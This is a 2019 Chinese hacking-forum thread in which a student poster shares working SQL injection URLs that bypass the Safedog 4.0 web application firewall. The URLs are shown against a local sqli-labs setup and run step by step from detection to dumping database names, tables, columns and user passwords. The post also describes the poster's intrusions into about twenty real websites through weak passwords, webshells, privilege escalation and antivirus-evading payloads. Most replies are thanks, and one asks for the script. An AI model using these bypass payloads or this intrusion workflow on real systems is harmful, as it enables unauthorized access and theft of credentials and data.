14 人签到
    搜索
    Hi~登录注册
    查看: 271|回复: 11
    收起左侧

    Mysql联合注入过4.0安全狗

    [复制链接]

    27

    主题

    0

    精华

    13 小时

    在线时间

    新手上路

    Rank: 1

    积分
    20
    发表于 2019-2-28 10:19:43 | 显示全部楼层 |阅读模式
    emm  自我介绍一下吧  今年大一了 去年的10月份开始 对自己了解到的web感兴趣   我已经学了4个多月了 网站也搞了二十来个了吧  不是去用工具那种批量sql等等的,我从一开始的sql注入 xss(因为在绕过方面还是不懂 所以特地花了点时间去学js jquery 但也就半斤八两吧。。)  到 之后的学习csrf crlf xml注入 等等,之后的话也去玩了点linux(ps 我觉得linux的字体看的很舒服。。。) ,在这时间还花了时间简单的学了 还是学了点的,带了也学了vim apt curl btadmin curl wget 一些命令的安装下载 但是我现在还是没有遇到一次xml注入   12.28号来到了土司 感觉能学到好多东西 然后自己也畏畏缩缩的发了一个贴 大家在下面评论 总觉的甜蜜蜜的。。在现在就是自己看传智的视频学主学php和python了   现在我感觉有点困惑 因为渗透的本质是搜集  我现在拿到了一个站 就是用基本的套路 google搜索语法找未授权 然后nmap扫描端口 banner 查看服务信息 然后去查找相关的漏洞  站点的方面入手的话就是 目录的查找 然后就会用avws 查看网站的结构的目录文件  还有的就是后台的弱口令(ps 用弱口令进的站倒有个2,3个)  利用相关的服务器和漏洞,突破上传拿到webshell之后 就是提权的问题了 现在我遇到一个站点 就是阿里云盾 和360全套 按照我现在所学的就是用免杀的exp尝试 然后用了上次t00ls发的土豆提权 这个也就唯一能拿的出手的免杀的了。。。因为发现systeminfo  它的补丁没有打  (我发现php过狗的一句话好写  可能因为是弱语言的原因吧····) 然后就是尽量用免杀的exp来使用 找了几个最新2018免杀的漏洞 发现可以执行 但是啥都没有反应。。。 最后就是尝试用msf生成了payload 再用shellter来修改shellcode了 最后发现还是没用 后来就发现免杀的重要性 感觉如果能免杀的话 其实很多事情就没必要了 有了一定的权限 一个免杀远控木马就相当于得到了一个服务器的控制权 (不知道是不是这样。。。)  端口转发的方面 其实我自己也有点困惑 因为我发现端口方法有很多方法 而我会的也就是最简单的转发 就是本机和对方的代理  我感觉应该就是一级代理吧  我对所谓的多层代理不是很明白 可能也没到内网渗透的方面吧 还有的就是对‘域’ 这个词也就半知半解 然后最近都是四处碰壁  感觉写出来之后 突然觉得好二 。。。 最近也有碰到linux安全模式的 尝试了百度到的脚本 可能执行的函数不够多吧 所以没有突破   我其实想问的就是 我现在要怎么做。。 因为我想学php的代码审计 (自己想去挖洞) 还有python脚本的编写 可能是批量的感觉真的很爽吧。。。还想学内网渗透 很有成就感  感觉方向很多 我不知道要怎么做 所以就写了这篇文章来问大家了。。。。。就是希望大家能给我提下建议了  其实寒假这个时间还想去挖洞的发现 自己这么菜 还是好好学习了








    emm 这是环境是我自己昨天刚搭建的 没有试过别的网站能不能过  大家可以自己测试下  不能过的话 评论下 我自己会删掉贴的。。。



    这个是自己用python跑出来的 主要的关键词已经在下面标记了



    环境是拿sqlilabs的第一关搭建的



    判断注入 http://192.168.1.131:88/sqlilabs/Less-1/index.php?id=1/*!and/*!1=2*/



    判断字段数  http://192.168.1.131:88/sqlilabs ... =1%20order%20by%20/*!1*/



    过union select字段   http://192.168.1.131:88/sqlilabs ... 2%20union--%0daa%0a(select%201,2,3)



    混淆     http://192.168.1.131:88/sqlilabs/Less-1/index.php?id=1e2/*%00``*//*!12345union*/--%20-%0daa%0a(select--%20-%0daa%0a1,2,3)



    爆库         http://192.168.1.131:88/sqlilabs/Less-1/index.php?id=1e2/*!union*/--%20-%0daa%0a(select~1,group_concat(SCHEMA_NAME),3%20from%20information_schema.SCHEMATA)



    爆表      http://192.168.1.131:88/sqlilabs/Less-1/index.php?id=1e2/*!union*/--%20-%0daa%0a(select~1,group_concat(TABLE_NAME),3 from information_schema.TABLES where TABLE_SCHEMA='security')


    爆字段        http://192.168.1.131:88/sqlilabs/Less-1/index.php?id=1e2/*!union*/--%20-%0daa%0a(select~1,group_concat(`column_name`),3%22%22from%20`information_schema`.`columns`%20where%20TABLE_NAME%20=%20%27users%27%20)



    爆内容        http://192.168.1.131:88/sqlilabs/Less-1/index.php?id=1e2/*!union*/--%20-%0daa%0a(select~1,password,3%22%22from%20users)



    关键:--%20-%0daa%0a

    Mysql联合注入过4.0安全狗






    上一篇:分享过D/360/狗的猥琐思路
    下一篇:xss盲打网贷实战
    回复

    使用道具 举报

    27

    主题

    0

    精华

    13 小时

    在线时间

    新手上路

    Rank: 1

    积分
    20
     楼主| 发表于 2019-4-30 09:43:37 | 显示全部楼层
    小小六 发表于 2019-4-24 09:45 PM
    楼主能分享下脚本吗

    联合注入一般都是手注的  脚本等我整理整理过两天看看可以的话再发出来吧
    回复 支持 反对

    使用道具 举报

    0

    主题

    0

    精华

    53 小时

    在线时间

    荣誉会员

    Rank: 8Rank: 8

    积分
    28
    发表于 2019-4-24 21:45:20 | 显示全部楼层
    楼主能分享下脚本吗
    回复 支持 反对

    使用道具 举报

    0

    主题

    0

    精华

    0 小时

    在线时间

    新手上路

    Rank: 1

    积分
    19
    发表于 2019-2-28 12:35:48 | 显示全部楼层
    楼主好人!!!
    回复 支持 反对

    使用道具 举报

    0

    主题

    0

    精华

    0 小时

    在线时间

    新手上路

    Rank: 1

    积分
    5
    发表于 2019-2-28 14:08:07 | 显示全部楼层
    打赏。。可以值得一看的好文
    回复 支持 反对

    使用道具 举报

    0

    主题

    0

    精华

    0 小时

    在线时间

    新手上路

    Rank: 1

    积分
    7
    发表于 2019-2-28 14:30:57 | 显示全部楼层
    提取好东西,谢谢楼主好人啊
    回复 支持 反对

    使用道具 举报

    0

    主题

    0

    精华

    0 小时

    在线时间

    新手上路

    Rank: 1

    积分
    33
    发表于 2019-2-28 14:58:22 | 显示全部楼层
    好东西一定要看看!
    回复 支持 反对

    使用道具 举报

    0

    主题

    0

    精华

    0 小时

    在线时间

    新手上路

    Rank: 1

    积分
    21
    发表于 2019-2-28 15:27:51 | 显示全部楼层
    好像还不错
    回复 支持 反对

    使用道具 举报

    0

    主题

    0

    精华

    0 小时

    在线时间

    新手上路

    Rank: 1

    积分
    7
    发表于 2019-3-1 11:56:14 | 显示全部楼层
    好东西,收了
    回复 支持 反对

    使用道具 举报

    0

    主题

    0

    精华

    0 小时

    在线时间

    新手上路

    Rank: 1

    积分
    7
    发表于 2019-3-1 12:36:23 | 显示全部楼层
    希望得到想要的
    回复 支持 反对

    使用道具 举报

    0

    主题

    0

    精华

    0 小时

    在线时间

    新手上路

    Rank: 1

    积分
    7
    发表于 2019-3-1 12:58:41 | 显示全部楼层
    谢谢您的分享!
    回复 支持 反对

    使用道具 举报

    0

    主题

    0

    精华

    0 小时

    在线时间

    新手上路

    Rank: 1

    积分
    10
    发表于 2019-3-1 14:11:27 | 显示全部楼层
    看看,感谢看看,感谢看看,感谢看看
    回复 支持 反对

    使用道具 举报

    游客
    回复
    您需要登录后才可以回帖 登录 | 获取账号

    快速回复 返回顶部 返回列表